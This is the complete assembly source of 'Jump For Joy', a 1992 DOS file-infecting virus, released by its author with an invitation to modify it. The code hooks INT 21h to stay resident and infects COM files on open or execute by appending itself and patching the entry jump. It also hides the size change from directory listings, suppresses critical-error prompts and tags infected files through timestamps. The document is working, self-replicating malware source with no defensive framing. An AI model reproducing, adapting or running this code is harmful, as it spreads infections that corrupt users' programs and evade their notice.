;J4J - Jump For Joy, released 31 Jan 92, (c) Charlie of Demoralized Youth ;------------------------------------------------------------------------ ;This source has been lying around for a veeeeeery long time, and I will ;*NOT* continue to make newer versions of J4J, so that is the reason ;why I release the source. ; ;It's been 'bout a month since my last glance on it, so it's maybe full ;of bugs, but anyways; assemble with A86 ; ;Some idea's were taken from Omicron / FLIP B (Just the startup), but ;the rest was done by CHARLIE of DEMORALIZED YOUTH! ; ;Fuck this code up however you like... tsr_bytes equ 1024 tsr_para equ (4096 / 16) cpt1 equ $ mov ax,1991 mov bx,ax mov cx,ax add ax,13881 int 21h cmp ax,cx je fail cmp sp,-10h jb fail mov ax,cs dec ax mov es,ax cmp byte es:[0000h],'Z' jne fail mov ax,es:[0003h] sub ax,tsr_para jc fail mov es:[0003h],ax sub word ptr es:[0012h],tsr_para mov es,es:[0012h] call $+3 cpt3 equ $ pop si mov bx,si sub si,(cpt3-cpt1) add si,(cpt4-cpt1) push cs push si mov si,bx sub si,(cpt3-cpt1) mov cx,offset total-100h mov di,100h push es rep movsb mov di,17Dh+2 push di retf cpt4 equ $ fail: mov ax,100h push ax xor ax,ax xor bx,bx xor cx,cx xor dx,dx xor si,si xor di,di xor bp,bp push cs push cs pop es pop ds mov word [100h],20CDh rpl1 equ $-2 mov byte [102h],90h rpl2 equ $-1 ret cpt2 equ $ jmp init fcb_open dw offset fcb_open_cont exec dw offset back open_handle dw offset back new_int_21: pushf cmp ah,0Fh ;open file using FCB's jne not_open_fcb call fcb_to_asciiz push dx push ds push cs pop ds mov dx,offset file push cs:[fcb_open] jmp file_main fcb_open_cont: pop ds pop dx jmp back not_open_fcb: ;cmp ah,4Eh ;je handle_dir ;cmp ah,4Fh ;je handle_dir cmp ah,11h je fcb_dir cmp ah,12h je fcb_dir cmp ah,3Eh jne clodd cmp bx,1991 jne clodd xchg ax,bx popf iret clodd: cmp ah,3Dh jne last_chance push cs:[open_handle] jmp file_main last_chance: cmp ax,4B00h jne back push cs:[exec] jmp file_main back: popf db 0EAh old_int_21 dw 0,0 handle_dir: popf call int21 pushf jnc back_handle_dir cmp ax,0 jne back_handle_dir call stealth_dir_handle sti back_handle_dir: popf iret fcb_dir: popf call int21 pushf cmp al,00h jne back_fcb_dir call stealth_dir_fcb sti back_fcb_dir: popf iret fcb_fname equ 80h+1 fcb_fext equ 80h+1+8 f_attr equ 80h+15h f_time equ 80h+16h f_date equ 80h+18h f_size equ 80h+1Ah f_asciiz equ 80h+1Eh f_handle equ 80h f_head_buffer equ 80h+2 f_tail_buffer equ 80h-3 f_type equ 80h+6 repl0: db 0E8h,?,? ;call ???? ;repl1: db 0C7h,6,0,1,?,? ;mov word [0100h],???? ; db 0C6h,6,2,1,? ;mov byte [0102h],?? repl2: push bp mov bp,sp sub word [bp+2],3 pop bp repl3: db 'Elo�, Elo�, lam� sabakt�ni?' file_main: pushf ;call other_file_type_check ;jnc file_main_pr1 jmp file_main_pr1 popf jmp back file_main_pr1: push ax push bx push cx push dx push si push di push bp push es push ds push cs pop es mov si,dx mov di,offset file cld mov cx,65 rep movsb push cs pop ds call setup_24 ;call cpu_check ;cmp ax,1 ;je file_slutt call file_info_get jc file_is_done call mekke_fil file_is_done: call file_info_set file_slutt: call rest_24 pop ds pop es pop bp pop di pop si pop dx pop cx pop bx pop ax popf ret ;jmp back file db 65 dup(0) old_dta dw ?,? file_info_get: mov ah,2Fh ;get DTA address call int21 mov old_dta[2],es mov old_dta[0],bx mov ah,1Ah ;set DTA address push cs pop ds mov dx,80h call int21 mov ah,4Eh ;FIND FIRST (get info about mov cx,1+2+32 ;our file) mov dx,offset file call int21 jnc file_info_get_ok stc ret stc ret file_info_get_ok: clc test word [f_attr],4 ;is the System attr. set? jnz offset file_info_get_ok-2 ;yeah, so don't do it.. cmp word [fcb_fname],'OC' ;like in: COmmand.com je offset file_info_get_ok-2 ;the command-interpreter cmp word [fcb_fname],'BI' ;like in: IBmbio.com and IBmdos.com je offset file_info_get_ok-2 ;the startup files for IBM-dos cmp word [fcb_fext],'YS' ;like in: country.SYs je offset file_info_get_ok-2 ;device drivers and .SYS files mov ax,4301h ;set attribute xor cx,cx ;attr=0 mov dx,offset file call int21 mov ax,3D02h ;open file mov dx,offset file call int21 jnc fig_open fig_fail: stc ret fig_open: mov [f_handle],ax mov bx,ax mov ah,3Fh ;read from file mov cx,3 ;3 bytes mov dx,f_head_buffer call int21 jnc fig_read jmp fig_fail fig_read: cmp ax,3 jne fig_fail mov ax,4200h xor cx,cx mov dx,[f_size] sub dx,3 mov bx,[f_handle] call int21 mov ah,3Fh mov cx,3 mov dx,f_tail_buffer call int21 cmp word [f_size+2],0 jnz fig_fail cmp [f_size],60000 ja fig_fail cmp word [f_head_buffer],'MZ' ;EXE 'ZM' ? je file_is_exe cmp word [f_head_buffer],'ZM' ;EXE 'MZ' ? je file_is_exe cmp word [f_head_buffer],-1 ;Device Driver ? je fig_fail mov byte [f_type],0 ;filetype = COM clc ret file_is_exe: mov byte [f_type],1 ;filetype = EXE clc ret file_info_set: mov ah,1Ah ;set DTA address mov dx,old_dta[0] mov bx,old_dta[2] mov ds,bx call int21 push cs pop ds mov ax,4301h ;restore ATTRibutes mov cx,[f_attr] mov dx,offset file call int21 mov ax,5701h ;restore DATE & TIME mov bx,[f_handle] mov cx,[f_time] and cl,255-31 or cl,30 mov dx,[f_date] call int21 mov ah,3Eh ;close file mov bx,[f_handle] call int21 ret db '���--?!?' mekke_fil: cmp [f_size],1023 ja not_one_n0 stc ret not_one_n0: cmp byte ptr [f_type],0 je not_one_n1 stc ret not_one_n1: cmp word ptr [f_tail_buffer],'4J' jne not_one stc ret not_one: mov ax,[f_size] ;calculate CALL sub ax,3 ;length mov repl0[1],ax mov ax,word [f_head_buffer] mov bl,byte [f_head_buffer]+2 mov [offset rpl1],ax mov [offset rpl2],bl ; mov word ptr repl1[4],ax ;restore orig bytes ; mov repl1[10],bl ;after CALL... mov ax,4200h ;seek to file_start mov bx,[f_handle] xor cx,cx mov dx,cx call int21 mov ah,40h ;write CALL XXXX mov bx,[f_handle] mov cx,3 ;3 bytes mov dx,offset repl0 call int21 mov ax,4202h ;seek to EOF mov bx,[f_handle] xor cx,cx mov dx,cx call int21 ; mov ah,40h ;write startup-code ; mov bx,[f_handle] ; mov cx,(offset repl3)-offset repl1 ; ;???? bytes ; mov dx,offset repl1 ; call int21 ; jc replace_them_now mov ah,40h ;write main code mov bx,[f_handle] mov cx,offset total-100h mov dx,100h call int21 jc $+2+1+1 clc ret replace_them_now: mov ax,4200h ;seek to beginning mov bx,[f_handle] ;of the file xor cx,cx mov dx,cx call int21 mov ah,40h ;error, so write mov bx,[f_handle] ;back 3 first bytes mov cx,3 mov dx,f_head_buffer call int21 stc ret db 'Charlie says: Support ()DEMORALIZED YOUTH() ' ;;************************************************************* ;;* CPU checker, coded by Data Disruptor / RABiD Nat'nl Corp. * ;;************************************************************* ;cpu_check: ; xor ax,ax ; push ax ; popf ; pushf ; pop ax ; and ax,0f000h ; cmp ax,0f000h ; je mc_8086 ; mov ax,0f000h ; push ax ; popf ; pushf ; pop ax ; and ax,0f000h ; jz mc_80286 ; mov ax,3 ; ret ;mc_80286: ; mov ax,2 ; ret ;mc_8086: ; mov ax,1 ; ret ;*************************************** ; ; Call previously saved Int 21h Handler ; ;*************************************** int21: pushf call dword ptr cs:old_int_21 ret ;********************************************** ; ; Int 24h (Critical Error Handler) Code & Data ; ;********************************************** err dw 0 old_24 dw ?,? new_24: inc cs:err mov al,0 stc iret ;**************************************************************** ; ; Fix so that Int 24h (Critical Error Handler) won't display the ; "abort, retry, fail?" message ; ;**************************************************************** setup_24: xor ax,ax mov ds,ax les bx,[24h*4] push cs pop ds mov word ptr old_24[0],bx mov word ptr old_24[2],es mov ds,ax mov word ptr [24h*4],offset new_24 mov word ptr [24h*4+2],cs push cs push cs pop es pop ds ret ;********************************************************** ; ; Restore original Int 24h (Critical Error Handler) vector ; ;********************************************************** rest_24: les bx,cs:old_24 xor ax,ax mov ds,ax mov word ptr [24h*4],bx mov word ptr [24h*4+2],es push cs pop ds ret ;********************************************************* ; ; Check if the filename has got an extension of .COM or ; .EXE. Returns with CY if not a valid filetype, or NC if ; it is a valid one. ; ;********************************************************* other_fail: pop bp pop ds pop es pop di pop si pop dx pop cx pop bx pop ax popf stc ;return with CY ret other_file_type_check: ;here the main routine starts pushf push ax push bx push cx push dx push si push di push es push ds push bp mov di,dx push ds pop es cld mov cx,127 xor al,al repnz scasb jne other_fail dec di dec di dec di dec di dec di xchg si,di lodsb cmp al,'.' jne other_fail lodsw and ax,0DFDFh cmp ax,'OC' je other_okfil cmp ax,'XE' je other_okfil jmp other_fail other_okfil: lodsb and al,0DFh cmp al,'M' je other_okfil2 cmp al,'E' jne other_fail other_okfil2: pop bp pop ds pop es pop di pop si pop dx pop cx pop bx pop ax popf clc ;return with NC ret stealth_dir_handle: jc done_stealthing_handle pushf push ax push bx push cx push dx push si push di push ds push es push bp mov ah,2Fh call int21 mov ax,word ptr es:[bx+16h] mov ah,1Eh and al,1Fh cmp al,ah jne done_stealthing_handle cmp word es:[bx+1Ah+2],0 jne done_stealthing_handle mov ax,word es:[bx+1Ah] sub ax,(offset total)-100h jc done_stealthing_handle mov word es:[bx+1Ah],ax done_stealthing_handle: pop bp pop es pop ds pop di pop si pop dx pop cx pop bx pop ax popf ret stealth_dir_fcb: pushf push ax push bx push cx push dx push si push di push ds push es push bp mov ah,2Fh call int21 ; mov es,ds ; mov bx,dx mov ax,word ptr es:[bx+14+10h] ;16h] mov ah,30 ;1Eh and al,31 ;1Fh cmp al,ah jne done_stealthing_fcb cmp word es:[bx+22+10h],0 ;+10h+2],0 jne done_stealthing_fcb mov ax,word es:[bx+20+10h] ;+10h] sub ax,(offset total)-100h jc done_stealthing_fcb mov word es:[bx+20+10h],ax done_stealthing_fcb: pop bp pop es pop ds pop di pop si pop dx pop cx pop bx pop ax popf ret init: cli push cs push cs pop ds pop es mov ax,3521h int 21h mov word ptr old_int_21[0],bx mov word ptr old_int_21[2],es mov dx,offset new_int_21 mov ax,2521h int 21h sti retf fcb_to_asciiz: pushf push ax push cx push si push di push es push cs pop es mov di,offset file cld mov si,dx ;fcb_start lodsb cmp al,0 je fcb_in_current_dir add al,'A' stosb mov al,':' stosb jmp anyway fcb_in_current_dir: inc si anyway: mov si,dx inc si mov cx,8 fcb_file_name_xfer: lodsb cmp al,' ' je fcb_done_1 stosb loop fcb_file_name_xfer fcb_done_1: mov al,'.' stosb mov si,dx ;fcb_start add si,1+8 mov cx,3 fcb_file_ext_xfer: lodsb cmp al,' ' je fcb_done_2 stosb loop fcb_file_ext_xfer fcb_done_2: mov al,0 stosb pop es pop di pop si pop cx pop ax popf ret size dw (offset total)-100h db 'J4J' total: